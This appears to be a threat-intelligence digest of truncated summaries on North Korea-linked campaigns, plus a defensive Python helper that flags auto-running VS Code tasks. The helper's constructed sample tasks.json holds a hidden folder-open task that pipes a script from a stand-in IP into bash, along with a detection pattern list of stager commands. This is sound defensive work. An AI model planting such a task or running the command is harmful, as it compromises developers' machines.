Darktrace observed a South Korea-focused campaign aligned with DPRK activity that used a JSE file disguised as an HWPX document and government-themed decoys impersonating the Ministry of Personnel Management. The script ran through Windows Script Host, un…
Recorded Future’s Insikt Group links PurpleBravo to North Korea’s Contagious Interview activity targeting software developers, especially those in cryptocurrency-related roles. The campaign uses fraudulent LinkedIn personas, fake recrui…
Kimsuky is described using malicious QR codes in spearphishing emails to move victims from managed desktops to less-protected mobile devices and evade URL inspection and sandboxing. The campaign targets think tanks, academic institutions, government-relat…
Hauri describes phishing emails that impersonate Secure Drive authentication and lure recipients into manually running malware attached to a message abusing the identity of a high-ranking public official. The malware relies on social engineering, obfuscat…
BlueNoroff is presented as the financially motivated arm of Lazarus, evolving from SWIFT and bank intrusions such as the Bangladesh Central Bank heist into sustained cryptocurrency and Web3 targeting. The excerpt traces campaigns including SnatchCrypto, f…
DPRK-attributed Contagious Interview operators are using fake recruitment and code-review projects to target software developers through GitHub-hosted repositories. The infection vector abuses Visual Studio Code workspace tasks, especially .vscode/tasks.j…
OpenSourceMalware traced the malicious npm package tailwindcss-forms-kit to the DPRK-linked Contagious Interview campaign, where fake recruiters target software engineers in cryptocurrency, Web3, and blockchain roles. The package masqueraded as a Tailwind…
Jamf Threat Labs describes an evolution of the DPRK-linked Contagious Interview campaign that abuses Microsoft Visual Studio Code task configuration files in malicious GitHub or GitLab repositories. Under recruitment or technical-assignment lures, a victi…
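The two entries above describe the same infection vector: a task in a repository's .vscode/tasks.json whose runOptions.runOn is set to "folderOpen", so that cloning the "assignment" and opening it in VS Code executes the attacker's command. The following triage helper is an added example, not code from Jamf, OpenSourceMalware or the campaign itself. It parses a tasks.json (VS Code accepts comments and trailing commas, so plain json.loads would choke), returns every task configured to auto-run, and scores the command against a small, assumed list of stager patterns. The sample tasks.json, the 203.0.113.10 address and the pattern list are all constructed for illustration.

```python
"""Flag VS Code workspace tasks that run automatically on folder open.

Hypothetical triage helper (not from Jamf or any campaign report). It reads a
.vscode/tasks.json as VS Code does (JSON with comments and trailing commas),
returns every task whose runOptions.runOn is "folderOpen", and notes common
download-and-execute patterns in the command. Sample input is constructed.
"""
import json
import re

# Constructed attacker-style tasks.json: a benign build task, then a task with a
# plausible label, a hidden terminal, and an auto-run trigger that pipes a
# remote script into bash. Assumed content, not from any real repository.
SAMPLE_TASKS_JSON = r'''
{
  // VS Code tasks.json allows comments and trailing commas
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "Initialize dev environment",
      "type": "shell",
      "command": "curl -fsSL http://203.0.113.10/setup.sh | bash",
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ],
}
'''

# Assumed heuristics for stager-like commands; tune for your environment.
STAGER_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"Invoke-WebRequest|\biwr\b",
    r"Invoke-Expression|\biex\b", r"\|\s*(ba)?sh\b",
    r"powershell[^\n]*\s-(enc|e)\b", r"base64", r"\bnode\s+-e\b",
]


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals, then trailing commas.

    Trailing-comma removal is a regex pass and assumes no string literal
    contains a comma directly followed by ] or }, which is fine for tasks.json.
    """
    out, i, n = [], 0, len(text)
    while i < n:
        ch = text[i]
        if ch == '"':  # copy a string literal verbatim, honouring escapes
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1
            out.append(text[i:j + 1])
            i = j + 1
        elif text.startswith("//", i):
            nl = text.find("\n", i)
            i = n if nl == -1 else nl
        elif text.startswith("/*", i):
            end = text.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(ch)
            i += 1
    return re.sub(r",(\s*[\]}])", r"\1", "".join(out))


def command_text(task: dict) -> str:
    """Flatten command and args, including per-OS overrides, into one string."""
    parts = []
    for scope in (task, task.get("windows", {}), task.get("linux", {}), task.get("osx", {})):
        cmd = scope.get("command")
        if isinstance(cmd, str):
            parts.append(cmd)
        parts.extend(a for a in scope.get("args", []) if isinstance(a, str))
    return " ".join(parts)


def find_autorun_tasks(tasks_json_text: str) -> list[dict]:
    """Return tasks that run on folder open, with any matched stager patterns."""
    doc = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in doc.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
            "indicators": [p for p in STAGER_PATTERNS if re.search(p, cmd, re.IGNORECASE)],
        })
    return findings


if __name__ == "__main__":
    for finding in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(finding)
```

Run it against any cloned "assignment" before opening the folder in the editor; the sample flags one task, labelled "Initialize dev environment", with a hidden terminal and curl-pipe-to-shell indicators. Two caveats: a task with no indicator hits is still worth reading if it auto-runs, and VS Code's Workspace Trust keeps tasks from running while a folder is in Restricted Mode, so the lure also has to talk the victim into trusting the folder.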
A malicious npm package named bigmathix impersonated the legitimate big.js library and introduced malicious version 1.0.2 after two benign releases and more than 20 days of dwell time. The package, published by jacksonroman338, used an obfuscated multi-st…
North Korean state-sponsored groups are described as expanding hybrid intrusion models that combine fake IT employment schemes, remote-work abuse, and malware delivery changes. Famous Chollima targeted U.S. and Western companies through fraudulent remote …
AhnLab’s December APT trends describe North Korean state-backed groups increasingly using fake IT employment schemes, legitimate hiring platforms, fabricated identities, and remote-work infrastructure to enter corporate environments. Famous Chollima targe…
Genians attributes Operation Poseidon to Konni APT and details a targeted phishing chain using South Korean financial and North Korean human rights-related lures. The actor used legitimate advertising redirect structures, especially ad.doubleclick[.]net…
Genians attributes Operation Poseidon to the Konni APT and describes spear-phishing activity that impersonated South Korean financial institutions and North Korean human rights organizations. The campaign used Google Ads and earlier NAVER ad-click redirec…
NSHC observed SectorA activity during December 2025 involving credential theft, remote access, and financially motivated targeting of finance, technology, and government environments. The DPRK-linked section highlights LummaC2 and OtterCookie use, WinRAR …
AhnLab’s December 2025 South Korea APT telemetry found spear phishing as the dominant delivery method, with LNK-based attacks accounting for the largest share of observed activity. The LNK chains executed malicious PowerShell commands to download payloads…